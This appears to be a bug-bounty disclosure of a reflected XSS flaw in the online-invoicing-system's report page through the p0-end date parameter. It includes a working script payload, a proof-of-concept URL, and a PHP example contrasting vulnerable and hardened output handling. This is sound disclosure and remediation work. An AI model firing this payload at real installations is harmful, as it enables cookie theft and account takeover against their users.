Cross-site Scripting (XSS) - Generic in bigprof-software/online-invoicing-system

Valid

Reported on

Mar 26th 2021


✍️ Description

A cross-site scripting (XSS) vulnerability allows remote attackers to inject JavaScript via the "p0-end" parameter.

🕵️‍♂️ Proof of Concept

You can find installation instructions here: https://bigprof.com/appgini/applications/online-invoicing-system


Vulnerable Parameter: p0-end (also p1-end and p2-end)


XSS Payload: 26/03/2021'"()%26%25<yes><ScRiPt%20>alert(2)</ScRiPt>


Once it's installed successfully, visit the PoC link below to trigger the XSS:

https://localhost/app/hooks/summary-reports-invoices-0.php?apply=1&comparison-period-1=1&comparison-period-2=1&order-by=label&p0-end=26/03/2021'"()%26%25<yes><ScRiPt%20>alert(2)</ScRiPt>&p0-start=01/03/2021&p1-end=26/02/2021&p1-start=01/02/2021&p2-end=26/03/2020&p2-start=01/03/2020&radio-label-align=text-right&radio-value-align=text-left&sorting-order=desc
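The PoC works because the report's date parameters are written back into the generated page without output encoding. The following is an added illustration of that pattern and of its hardened form; it is not code from online-invoicing-system or AppGini, and the function names, the `<input>` markup and the dd/mm/yyyy shape of the parameter are assumptions taken only from the URL above.

```php
<?php
// Added example, not code from the project. Helper names are hypothetical.
// In the PoC URL, p0-end carries a report period end date such as "26/03/2021".

/**
 * Vulnerable pattern (illustration only): the raw query-string value is
 * concatenated into markup, so any tags or quotes in p0-end become part of
 * the DOM and the browser executes whatever script they contain.
 */
function render_period_end_unsafe(array $query): string
{
    $end = $query['p0-end'] ?? '';
    return '<input name="p0-end" value="' . $end . '">';
}

/**
 * Accept only a well-formed dd/mm/yyyy calendar date; anything else is
 * rejected. checkdate() takes (month, day, year), so the groups are reordered.
 */
function parse_report_date(string $raw): ?string
{
    if (!preg_match('~^(\d{2})/(\d{2})/(\d{4})$~', $raw, $m)) {
        return null;
    }
    return checkdate((int) $m[2], (int) $m[1], (int) $m[3]) ? $raw : null;
}

/**
 * Hardened pattern: validate the input against the only shape it may take,
 * fall back to an empty value otherwise, and HTML-encode on output anyway so
 * the two defences do not depend on each other. ENT_QUOTES covers both quote
 * styles, which matters because the value sits inside a quoted attribute.
 */
function render_period_end_safe(array $query): string
{
    $end = parse_report_date((string) ($query['p0-end'] ?? '')) ?? '';
    $encoded = htmlspecialchars($end, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input name="p0-end" value="' . $encoded . '">';
}

// Constructed inputs: a benign date and the payload shape from the report,
// already URL-decoded the way PHP exposes it in $_GET.
$benign  = ['p0-end' => '26/03/2021'];
$hostile = ['p0-end' => '26/03/2021\'"()&%<yes><ScRiPt >alert(2)</ScRiPt>'];

echo render_period_end_unsafe($hostile), PHP_EOL; // markup reaches the page unchanged
echo render_period_end_safe($benign), PHP_EOL;    // date is preserved
echo render_period_end_safe($hostile), PHP_EOL;   // value is rejected and rendered empty
```

For a fix of this class of bug, the validation step alone would already stop the PoC, but encoding on output is the control that holds when a future code path forgets to validate; the comparison periods p1-end and p2-end named in the report would be handled by the same helper.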


💥 Impact

With the help of XSS, an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies, leading to account takeover, and deliver malware to their system; there are many more attack scenarios a skilled attacker can carry out with XSS.

BigProf Software validated this vulnerability a year ago
Piyush Patil has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software confirmed that a fix has been merged on f839f7 a year ago
BigProf Software has been awarded the fix bounty
Piyush Patil
9 months ago

Researcher


Hi @BigProf Software, can you request a CVE?